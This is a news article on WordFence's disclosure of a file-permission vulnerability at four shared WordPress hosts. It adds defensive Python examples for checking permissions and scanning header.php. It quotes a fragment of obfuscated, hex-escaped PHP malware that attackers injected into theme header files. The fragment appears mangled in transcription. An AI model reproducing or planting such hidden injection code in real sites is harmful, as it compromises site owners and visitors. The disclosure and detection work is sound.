
Web Host Vulnerability Discovered on iPage, FatCow, PowWeb and NetFirm via @martinibuster

 

 


WordFence announced that it has discovered a vulnerability affecting four hosting companies. WordFence warns that although the vulnerability has been fixed, sites may have been hacked before the fix.

The server settings allowed hackers to create WordPress administrator accounts, from which sites could be exploited by adding unauthorized code to the WordPress theme.

WordFence urged site administrators to check their sites for unauthorized administrator accounts if they are hosted on iPage, FatCow, PowWeb or NetFirm. All four belong to the same company, Endurance International Group.

What was the server vulnerability?

Affected servers had permission and file settings that allowed an attacker to view sensitive files. Other vulnerabilities allowed attackers to access the database, add themselves as administrators and then take control of the site.

This is how WordFence described the vulnerability:

"Four conditions existed that contributed to this vulnerability:

1. The client files are all stored on a shared file system.

2. The full access path to a user's web root directory was public or could be guessed.

3. All directories in the path to the root directory of a customer's site were either world-traversable (the execute bit for 'all users' was 1) or group-traversable (the execute bit for 'group' was 1), and the sensitive files were world-readable (the read bit for 'all users' is equal to 1) or group-readable (the read bit for 'group' is equal to 1).

4. An attacker could cause a program running in the www group to read files in arbitrary locations."
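
Condition 3 can be checked from the mode bits alone. The following Python sketch is an added example, not code from WordFence or the hosting companies; it assumes wp-config.php is the sensitive file, builds a constructed directory tree as sample input, and reads only the group/other bits without resolving which group owns each directory.

```python
import os
import stat
import tempfile

SENSITIVE = ("wp-config.php",)  # assumption: the file holding DB credentials

def _classes(mode, group_bit, other_bit):
    """Non-owner classes ('group', 'other') for which the given bit is set."""
    pairs = (("group", group_bit), ("other", other_bit))
    return [name for name, bit in pairs if mode & bit]

def path_chain(web_root, base="/"):
    """Directories from just below base down to web_root, top first."""
    cur, base = os.path.realpath(web_root), os.path.realpath(base)
    chain = []
    while cur != base and cur != os.path.dirname(cur):
        chain.append(cur)
        cur = os.path.dirname(cur)
    return chain[::-1]

def audit(web_root, base="/", sensitive=SENSITIVE):
    """Report closed directories and sensitive files left exposed (condition 3)."""
    # A directory is "closed" when neither group nor other may traverse it.
    closed = [d for d in path_chain(web_root, base)
              if not _classes(os.stat(d).st_mode, stat.S_IXGRP, stat.S_IXOTH)]
    exposed = {}
    for name in sensitive:
        path = os.path.join(os.path.realpath(web_root), name)
        if not os.path.isfile(path):
            continue
        readers = _classes(os.stat(path).st_mode, stat.S_IRGRP, stat.S_IROTH)
        # Exposed only if readable by non-owners AND every directory is open.
        if readers and not closed:
            exposed[path] = readers
    return {"closed_dirs": closed, "exposed": exposed}

def make_sample_tree(dir_mode, file_mode):
    """Constructed home/user/public_html tree; returns (web_root, base)."""
    base = os.path.realpath(tempfile.mkdtemp())
    web_root = os.path.join(base, "home", "user", "public_html")
    os.makedirs(web_root)
    for d in path_chain(web_root, base):
        os.chmod(d, dir_mode)
    cfg = os.path.join(web_root, "wp-config.php")
    with open(cfg, "w") as fh:
        fh.write("<?php // constructed placeholder\n")
    os.chmod(cfg, file_mode)
    return web_root, base
```

On a real account, call audit() with the path to the web root; a single closed directory in the chain, or a sensitive file with no group/other read bit, empties the "exposed" result.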

The Sites Could Get Infected

WordFence warned that it took some time before the vulnerability was corrected, during which sites hosted on these four hosting providers could have been infected.

Site owners are advised to check their user lists to ensure there are no unauthorized administrators. If your site has been affected, unauthorized code would have been added to the theme.

This is how WordFence described the malicious code:

"If your site was exploited before the patches, the attackers may have added malware that could still be present. Our customers had hidden code added at the top of the header.php file of the active theme, as follows:

<? Php $ {" x47 x4c x4f x42 x41 x4c x53"} [“ddx70x68zx67x64gx”] = "sl x77k x77i"; $ {" x47 x4cO x42 x41L x53"} [“cx7ax66x6dubkdox6ax78″] = " x6c x6f x63 x61t x69 x6fn" $ {"" x47 x4c x4fB x41LS "} [“x67x64x64ex74x62px75fx65i”] =" x68t x6d x6c "; $ {" x47 x4cOB x41 x4cS"} [“x77ix64x68x6bvx6da”] = " x73t x72 x66"; $ {" X47 x4c x4f x42 x41 x4c x53"} [“x66sx75x71x79x6evw”] = "b x6f x74"; $ {" x47 x4cOBAL x53"} [“wx6cx79x63x61x76x62x71x68x6fx6cx75″] = "cac x68 x65"; $ {"G x4cO x42 x41L x53"} [“ryx68x72kux6b”] = " x73 x63h x65 x6d x65"; $ {" x47 x4c x4f x42 x41 x53"} [“x74x6ax6bcx64ex65x69w”] = " x73l x77k x77i x32"; $ {"G x4cOBA x4cS"} [“x79x65x64x73x67x6ahx69x73x67″] = " x73 x6c x74 x65 x69l x73" "

The vulnerability has been corrected

WordFence disclosed the vulnerability to the web hosts before making a public announcement. The hosting companies quickly fixed the vulnerabilities.

However, as WordFence advises, check your user lists for unauthorized administrator-level accounts and your header.php file for unauthorized code.

Read the full announcement on the WordFence blog

Images by Shutterstock, modified by the author
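
One way to run the header.php check, as an added Python example (not WordFence's code): it decodes PHP \xHH escapes inside ${"..."} variable-variables and flags a file whose opening bytes hide the name GLOBALS, the pattern in the sample quoted above. It is a heuristic; the sample strings, the 4096-byte window and the escape-count threshold are constructed assumptions.

```python
import re

# PHP double-quoted strings accept \xHH escapes (one or two hex digits).
HEX_ESC = re.compile(r"\\x([0-9A-Fa-f]{1,2})")
# ${"..."} is PHP's variable-variable syntax with a string-literal name.
VAR_VAR = re.compile(r'\$\{\s*"((?:[^"\\]|\\.)*)"\s*\}')

def decode_hex_escapes(s):
    """Turn \\xHH sequences into the characters PHP would see."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)

def scan_header(text, head_bytes=4096, min_escapes=8):
    """Inspect the start of a header.php for hex-escaped variable names."""
    head = text[:head_bytes]
    hidden = []
    for m in VAR_VAR.finditer(head):
        raw = m.group(1)
        decoded = decode_hex_escapes(raw)
        if decoded != raw:          # the name was written with escapes
            hidden.append(decoded)
    escapes = len(HEX_ESC.findall(head))
    return {
        "hidden_names": hidden,
        "hex_escapes": escapes,
        # Flag either the hidden superglobal or a dense run of escapes.
        "suspicious": "GLOBALS" in hidden or escapes >= min_escapes,
    }

# Constructed samples: a plain theme header, and the same header with one
# harmless assignment written in the obfuscation style described above.
CLEAN = (
    "<!DOCTYPE html>\n<html <?php language_attributes(); ?>>\n"
    "<head>\n<?php wp_head(); ?>\n</head>\n"
)
INFECTED = (
    r'<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["k1"]="\x68t\x6d\x6c"; ?>'
    + CLEAN
)

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN), ("infected", INFECTED)):
        print(label, scan_header(sample))
```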